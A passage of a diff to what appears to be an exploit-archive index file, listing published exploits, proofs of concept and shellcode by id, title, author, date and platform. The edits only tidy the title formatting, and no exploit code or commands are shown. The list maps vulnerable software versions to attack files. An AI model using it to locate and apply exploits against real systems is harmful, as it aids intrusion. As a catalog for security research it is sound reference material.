RDoS",2011-04-10,BraniX,windows,dos,0 17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 -17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip) File Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 +17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip File) Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection Vulnerability",2011-04-11,R3d-D3V!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability",2011-04-11,ph0x90bic,linux,local,0 17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,metasploit,multiple,remote,10001 @@ -14967,7 +14967,7 @@ id,file,description,date,author,platform,type,port 17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow",2011-04-19,metasploit,windows,remote,0 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,metasploit,unix,remote,0 17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisitent XSS",2011-04-22,Saif,php,webapps,0 -17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 +17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 17202,platforms/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 17203,platforms/php/webapps/17203.txt,"Web2Project 2.3 - SQL Injection Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0 17204,platforms/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps,0 @@ -15051,7 +15051,7 @@ id,file,description,date,author,platform,type,port 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0 17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0 17308,platforms/php/webapps/17308.txt,"Zen Cart <= 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 -17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass - SO-11-007",2011-05-20,"Sense of Security",php,webapps,0 +17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps,0 17311,platforms/php/webapps/17311.txt,"E-Manage MySchool 7.02 SQL Injection Vulnerability",2011-05-21,az7rb,php,webapps,0 17312,platforms/php/webapps/17312.txt,"tugux CMS 1.2 - Multiple Vulnerabilities",2011-05-22,LiquidWorm,php,webapps,0 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow",2011-05-22,metasploit,windows,local,0 @@ -15122,7 +15122,7 @@ id,file,description,date,author,platform,type,port 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0 17398,platforms/windows/dos/17398.txt,"Windows Media Player with K-Lite Codec Pack DoS PoC",2011-06-14,"Nicolas Krassas",windows,dos,0 -17399,platforms/windows/dos/17399.txt,"Microsoft Office XP Remote code Execution",2011-06-14,"Francis Provencher",windows,dos,0 +17399,platforms/windows/dos/17399.txt,"Microsoft Office XP - Remote code Execution",2011-06-14,"Francis Provencher",windows,dos,0 17400,platforms/linux/dos/17400.c,"Conky Linux 1.8.0 - Local DoS/PoC Exploit",2011-06-14,"Arturo D'Elia",linux,dos,0 17401,platforms/windows/dos/17401.txt,"Microsoft HyperV Persistent DoS Vulnerability",2011-06-14,"Core Security",windows,dos,0 17402,platforms/php/webapps/17402.txt,"AMHSHOP 3.7.0 - SQL Injection",2011-06-15,"Yassin Aboukir",php,webapps,0 @@ -15141,7 +15141,7 @@ id,file,description,date,author,platform,type,port 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,metasploit,windows,remote,0 17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-06-20,TecR0c,php,webapps,0 -17419,platforms/windows/remote/17419.zip,"Mozilla Firefox ""nsTreeRange"" Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 +17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - ""nsTreeRange"" Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service Vulnerability PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download Vulnerability",2011-06-21,ShellVision,hardware,remote,0 17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 @@ -15183,7 +15183,7 @@ id,file,description,date,author,platform,type,port 17471,platforms/windows/dos/17471.py,"Donar Player 2.8.0 - Denial of Service Vulnerability",2011-07-03,X-h4ck,windows,dos,0 17472,platforms/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0 -17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0 +17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053)",2011-07-03,"Myo Soe",windows,dos,0 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0 @@ -15197,7 +15197,7 @@ id,file,description,date,author,platform,type,port 17485,platforms/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection Vulnerability",2011-07-04,kaMtiEz,php,webapps,0 17486,platforms/multiple/local/17486.php,"PHP 5.3.6 - Buffer Overflow PoC (ROP)",2011-07-04,"Jonathan Salwan",multiple,local,0 17487,platforms/php/webapps/17487.php,"WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit",2011-07-04,EgiX,php,webapps,0 -17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)",2011-07-04,extraexploit,windows,local,0 +17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 - XFDF Buffer Overflow Vulnerability (SEH)",2011-07-04,extraexploit,windows,local,0 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow Exploit (MSF)",2011-07-04,"James Fitts",windows,local,0 17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow",2011-07-04,metasploit,windows,remote,0 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - (.ord) Buffer Overflow Vulnerability (MSF)",2011-07-05,"James Fitts",windows,local,0 @@ -15206,7 +15206,7 @@ id,file,description,date,author,platform,type,port 17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - (.zip) Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17495,platforms/php/webapps/17495.txt,"BbZL.PhP File Inclusion Exploit",2011-07-06,"Number 7",php,webapps,0 17496,platforms/php/webapps/17496.txt,"Joomla 1.6.3 - CSRF Exploit",2011-07-06,"Luis Santana",php,webapps,0 -17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability",2011-07-06,LiquidWorm,windows,dos,0 +17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 - ASX Playlist File Handling Buffer Overflow Vulnerability",2011-07-06,LiquidWorm,windows,dos,0 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server Buffer Overflow Vulnerability (MSF)",2011-07-07,"James Fitts",windows,remote,0 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (MSF)",2011-07-07,"James Fitts",windows,local,0 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection Vulnerability",2011-07-07,kaMtiEz,php,webapps,0 @@ -15221,7 +15221,7 @@ id,file,description,date,author,platform,type,port 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow",2011-07-09,metasploit,windows,remote,0 17514,platforms/php/webapps/17514.php,"phpMyAdmin 3.x Swekey Remote Code Injection Exploit",2011-07-09,Mango,php,webapps,0 17515,platforms/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 - Local File Inclusion Vulnerability",2011-07-09,Or4nG.M4N,php,webapps,0 -17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 MiTM Attack",2011-07-09,Nibin,windows,remote,0 +17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0 17518,platforms/php/webapps/17518.txt,"Tugux CMS 1.2 (pid) Arbitrary File Deletion Vulnerability",2011-07-10,LiquidWorm,php,webapps,0 17519,platforms/windows/remote/17519.py,"Freefloat FTP Server (LIST command) Buffer Overflow Exploit",2011-07-10,"Zer0 Thunder",windows,remote,0 17520,platforms/windows/remote/17520.rb,"Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability",2011-07-10,metasploit,windows,remote,0 @@ -15242,7 +15242,7 @@ id,file,description,date,author,platform,type,port 17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 - MKD Buffer Overflow Exploit",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server MKD Buffer Overflow (MSF)",2011-07-18,"James Fitts",windows,remote,0 17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow",2011-07-17,metasploit,windows,remote,0 -17544,platforms/windows/dos/17544.txt,"GDI+ CreateDashedPath Integer Overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 +17544,platforms/windows/dos/17544.txt,"GDI+ - CreateDashedPath Integer Overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 17545,platforms/win32/shellcode/17545.txt,"win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes",2011-07-18,KaHPeSeSe,win32,shellcode,0 17546,platforms/windows/remote/17546.py,"FreeFloat FTP Server 1.0 - REST & PASV Buffer Overflow Exploit",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 17553,platforms/php/webapps/17553.txt,"Appointment Booking Pro Joomla Component LFI Vulnerability",2011-07-20,"Don Tukulesto",php,webapps,0 @@ -15259,16 +15259,16 @@ id,file,description,date,author,platform,type,port 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys <= 2011.7.8.913 - Local Kernel Mode Privilege Escalation Exploit",2011-07-22,MJ0011,windows,local,0 17562,platforms/php/webapps/17562.php,"ExtCalendar2 (Auth Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow Exploit (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 -17564,platforms/osx/shellcode/17564.asm,"OSX universal ROP shellcode",2011-07-24,pa_kt,osx,shellcode,0 +17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP shellcode",2011-07-24,pa_kt,osx,shellcode,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 -17567,platforms/osx/dos/17567.txt,"Safari SVG DOM processing PoC",2011-07-25,"Nikita Tarakanov",osx,dos,0 +17567,platforms/osx/dos/17567.txt,"Safari - SVG DOM Processing PoC",2011-07-25,"Nikita Tarakanov",osx,dos,0 17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name DoS",2011-07-25,"Craig Freyman",windows,dos,0 17570,platforms/php/webapps/17570.txt,"Musicbox <= 3.7 - Multiple Vulnerabilites",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 -17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)",2011-07-26,Abysssec,windows,remote,0 +17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 - SVG Remote Code Execution Exploit (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC",2011-07-27,"Narendra Shinde",cgi,webapps,0 17578,platforms/windows/remote/17578.txt,"MinaliC Webserver 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart <= 1.1.7 - Blind time-based SQL Injection (MSF)",2011-07-28,TecR0c,php,webapps,0 @@ -15434,7 +15434,7 @@ id,file,description,date,author,platform,type,port 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - (.plf) PlayList Buffer Overflow",2011-09-01,metasploit,windows,local,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin <= 1.1 - SQL Injection Vulnerability",2011-09-02,"Miroslav Stampar",php,webapps,0 -17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 +17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0 17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0 @@ -15486,7 +15486,7 @@ id,file,description,date,author,platform,type,port 17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,metasploit,windows,remote,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection Vulnerability",2011-09-13,sherl0ck_,php,webapps,0 17828,platforms/php/webapps/17828.txt,"Wordpress Plugin Forum Server <= 1.7 - SQL Injection Vulnerability",2011-09-13,"Miroslav Stampar",php,webapps,0 -17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 +17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service <= 5.2.3790.4520 - Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 17831,platforms/windows/dos/17831.txt,"Microsoft WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 17832,platforms/php/webapps/17832.txt,"Wordpress Plugin e-Commerce <= 3.8.6 - SQL Injection Vulnerability",2011-09-14,"Miroslav Stampar",php,webapps,0 17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,metasploit,windows,local,0 @@ -15778,7 +15778,7 @@ id,file,description,date,author,platform,type,port 18177,platforms/php/webapps/18177.txt,"WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u)",2011-11-30,Rh0,windows,local,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller Authentication Bypass Vulnerability",2011-11-30,"Alexey Sintsov",jsp,remote,0 -18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit",2011-12-01,kingcope,freebsd,remote,0 +18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Jail Break",2011-12-01,kingcope,windows,remote,0 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer Remote Stack BoF",2011-12-01,"Nick Freeman",windows,remote,0 18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows",2011-12-01,"Nick Freeman",windows,local,0 @@ -15976,7 +15976,7 @@ id,file,description,date,author,platform,type,port 18435,platforms/php/webapps/18435.txt,"phpShowtime Directory Traversal",2012-01-31,"Red Security TEAM",php,webapps,0 18436,platforms/linux/dos/18436.txt,"sudo 1.8.0 - 1.8.3p1 Format String Vulnerability",2012-01-31,joernchen,linux,dos,0 18434,platforms/php/webapps/18434.txt,"Snort Report <= 1.3.2 - SQL Injection Vulnerability",2012-01-31,"a.kadir altan",php,webapps,0 -18437,platforms/windows/remote/18437.txt,"Adobe Flash Player MP4 SequenceParameterSetNALUnit Remote Code Execution Exploit",2012-01-31,Abysssec,windows,remote,0 +18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution Exploit",2012-01-31,Abysssec,windows,remote,0 18438,platforms/php/webapps/18438.txt,"Ez Album Blind SQL Injection Vulnerability",2012-01-31,"Red Security TEAM",php,webapps,0 18439,platforms/php/webapps/18439.txt,"PragmaMX 1.2.10 Persistent XSS Vulnerability",2012-01-31,HauntIT,php,webapps,0 18440,platforms/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC",2012-01-31,LiquidWorm,windows,dos,0 @@ -16100,11 +16100,11 @@ id,file,description,date,author,platform,type,port 18583,platforms/php/webapps/18583.txt,"Saman Portal Local File Inclusion Vulnerability",2012-03-12,TMT,php,webapps,0 18584,platforms/windows/dos/18584.txt,"GOM Media Player 2.1.37 - Buffer Overflow Vulnerability",2012-03-12,longrifle0x,windows,dos,0 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux x86_64 - add user with passwd (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 -18586,platforms/windows/dos/18586.txt,"XnView FlashPix Image Processing Heap Overflow",2012-03-12,"Francis Provencher",windows,dos,0 +18586,platforms/windows/dos/18586.txt,"XnView FlashPix Image Processing - Heap Overflow",2012-03-12,"Francis Provencher",windows,dos,0 18587,platforms/windows/dos/18587.py,"Network Instrument Observer SNMP SetRequest Denial of Service Vulnerability",2012-03-12,"Francis Provencher",windows,dos,0 18616,platforms/php/webapps/18616.txt,"Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability",2012-03-18,"Easy Laster",php,webapps,0 18618,platforms/php/webapps/18618.pl,"Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit",2012-03-19,"A. Ramos",php,webapps,0 -18619,platforms/multiple/remote/18619.txt,"Apache Tomcat Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 +18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 18589,platforms/php/webapps/18589.txt,"Acal calendar 2.2.6 - CSRF Vulnerability",2012-03-12,"Number 7",php,webapps,0 18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18590,platforms/php/webapps/18590.txt,"PBLang Local file include Vulnerability",2012-03-13,"Number 7",php,webapps,0 @@ -17574,7 +17574,7 @@ id,file,description,date,author,platform,type,port 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability",2000-09-26,"Ussr Labs",windows,remote,0 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 Weak Encryption Vulnerability",2000-09-26,@stake,palm_os,local,0 20242,platforms/cgi/remote/20242.txt,"Unixware 7.0 SCOhelp HTTP Server Format String Vulnerability",2000-09-26,"Juliano Rizzo",cgi,remote,0 -20243,platforms/windows/remote/20243.html,"Microsoft Windows Script Host 5.1/5.5 GetObject() File Disclosure Vulnerability",2000-09-26,"Georgi Guninski",windows,remote,0 +20243,platforms/windows/remote/20243.html,"Microsoft Windows Script Host 5.1/5.5 - GetObject() File Disclosure Vulnerability",2000-09-26,"Georgi Guninski",windows,remote,0 20244,platforms/cgi/remote/20244.txt,"TalentSoft Web+ Client/Monitor/server 4.6 Internal IP Address Disclosure",2000-09-27,"Delphis Consulting",cgi,remote,0 20245,platforms/cgi/remote/20245.txt,"TalentSoft Web+ Client/Monitor/server 4.6 Source Code Disclosure Vulnerability",2000-09-27,"Delphis Consulting",cgi,remote,0 20246,platforms/linux/remote/20246.txt,"TalentSoft Web+ Application Server (Linux) 4.6 Example Script File Disclosure",2000-09-26,DCIST,linux,remote,0 @@ -19287,7 +19287,7 @@ id,file,description,date,author,platform,type,port 22024,platforms/windows/remote/22024.txt,"TFTPD32 2.50 - Arbitrary File Download/Upload Vulnerability",2002-11-18,"Aviram Jenik",windows,remote,0 22025,platforms/windows/remote/22025.pl,"TFTPD32 2.50 - Long Filename Buffer Overflow Vulnerability",2002-11-19,"Aviram Jenik",windows,remote,0 22026,platforms/linux/remote/22026.txt,"Mhonarc 2.5.x Mail Header HTML Injection Vulnerability",2002-11-19,"Steven Christey",linux,remote,0 -22027,platforms/windows/remote/22027.txt,"Microsoft Java Virtual Machine 3802 Series Bytecode Verifier Vulnerability",2002-11-21,"Last Stage of Delirium",windows,remote,0 +22027,platforms/windows/remote/22027.txt,"Microsoft Java Virtual Machine 3802 Series - Bytecode Verifier Vulnerability",2002-11-21,"Last Stage of Delirium",windows,remote,0 22028,platforms/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 Command Execution Vulnerability",2002-11-21,"Last Stage of Delirium",windows,remote,0 22029,platforms/multiple/remote/22029.txt,"Sun/Netscape Java Virtual Machine1.x Bytecode Verifier Vulnerability",2002-11-21,"Last Stage of Delirium",multiple,remote,0 22030,platforms/php/webapps/22030.php,"VBulletin 2.0/2.2.x Memberlist.PHP Cross-Site Scripting Vulnerability",2002-11-22,Sp.IC,php,webapps,0 @@ -19924,7 +19924,7 @@ id,file,description,date,author,platform,type,port 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit",2012-11-13,"Ben Sheppard",windows,remote,0 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 Crash PoC",2012-11-13,coolkaveh,windows,dos,0 22680,platforms/windows/dos/22680.txt,"IrfanView RLE Image Decompression Buffer Overflow Vulnerability",2012-11-13,"Francis Provencher",windows,dos,0 -22681,platforms/windows/dos/22681.txt,"IrfanView TIF Image Decompression Buffer Overflow Vulnerability",2012-11-13,"Francis Provencher",windows,dos,0 +22681,platforms/windows/dos/22681.txt,"IrfanView - .TIF Image Decompression Buffer Overflow Vulnerability",2012-11-13,"Francis Provencher",windows,dos,0 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow Vulnerabilities",2012-11-13,Vulnerability-Lab,windows,dos,0 @@ -30964,7 +30964,7 @@ id,file,description,date,author,platform,type,port 34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 - 'calendar' Cross-Site Scripting Vulnerability",2009-11-02,"Vladimir Vorontsov",php,webapps,0 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 -34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - (.mp3) File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0 +34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - (.mp3 File) Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 @@ -31016,7 +31016,7 @@ id,file,description,date,author,platform,type,port 34418,platforms/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting Vulnerability",2010-08-06,MustLive,php,webapps,0 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - XSS Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 -34421,platforms/linux/local/34421.c,"glibc Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0 +34421,platforms/linux/local/34421.c,"glibc - Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0 34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x - 4.1.2 (search.php cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 34426,platforms/linux/remote/34426.txt,"uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection Vulnerability",2010-08-05,Chuzz,linux,remote,0 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption Vulnerability",2010-08-07,"Georgi Guninski",linux,dos,0 @@ -32045,7 +32045,7 @@ id,file,description,date,author,platform,type,port 35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rösemann",php,webapps,80 35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - (.avi) Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 -35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - (.avi) File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 +35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - (.avi File) Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0 35555,platforms/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting Vulnerability",2011-04-01,"Antu Sanadi",php,webapps,0 35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Include Vulnerabilities",2011-04-04,KedAns-Dz,php,webapps,0 @@ -32155,7 +32155,7 @@ 